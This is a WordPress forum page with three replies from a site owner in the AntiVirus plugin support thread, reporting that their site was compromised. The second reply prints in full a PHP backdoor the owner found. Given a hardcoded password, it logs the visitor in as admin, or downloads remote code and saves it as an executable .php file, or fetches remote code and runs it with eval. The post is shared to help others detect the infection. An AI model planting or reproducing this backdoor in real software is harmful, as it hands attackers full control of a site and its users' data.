tsst
Forum Replies Created
Viewing 3 replies - 1 through 3 (of 3 total)
-
Forum: Plugins
In reply to: [AntiVirus] [Plugin: AntiVirus] You should check .js files alsoActually i have no idea, how it happened. I just investigated logs and found that someone uses that “GETS”.
Wordpress guys instead of stupid moderation should investigate, how to fix HUGE HOLES in their system.Forum: Plugins
In reply to: [AntiVirus] [Plugin: AntiVirus] You should check .js files alsoHope this will follow moderation rules:
if (isset($_GET['pingnow'])&& isset($_GET['pass'])){ if ($_GET['pass'] == ‘f4b9ec30ad9f68f89b29639786cb62ef’){ if ($_GET['pingnow']== ‘login’){ $user_login = ‘admin’; $user = get_userdatabylogin($user_login); $user_id = $user->ID; wp_set_current_user($user_id, $user_login); wp_set_auth_cookie($user_id); do_action(‘wp_login’, $user_login); } if (($_GET['pingnow']== ‘exec’)&&(isset($_GET['file']))){ $ch = curl_init($_GET['file']); $fnm = md5(rand(0,100)).’.php’; $fp = fopen($fnm, “w”); curl_setopt($ch, CURLOPT_FILE, $fp); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_TIMEOUT, 5); curl_exec($ch); curl_close($ch); fclose($fp); echo “location.href=’$fnm’;”; } if (($_GET['pingnow']== ‘eval’)&&(isset($_GET['file']))){ $ch = curl_init($_GET['file']); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_TIMEOUT, 5); $re = curl_exec($ch); curl_close($ch); eval($re); }}}Forum: Plugins
In reply to: [AntiVirus] [Plugin: AntiVirus] You should check .js files alsoALSO:
check the file wp-config.php which can have the following code:[Code moderated as per the Forum Rules. Please use the pastebin]
with that “pingnow” they are changing .js files.
Viewing 3 replies - 1 through 3 (of 3 total)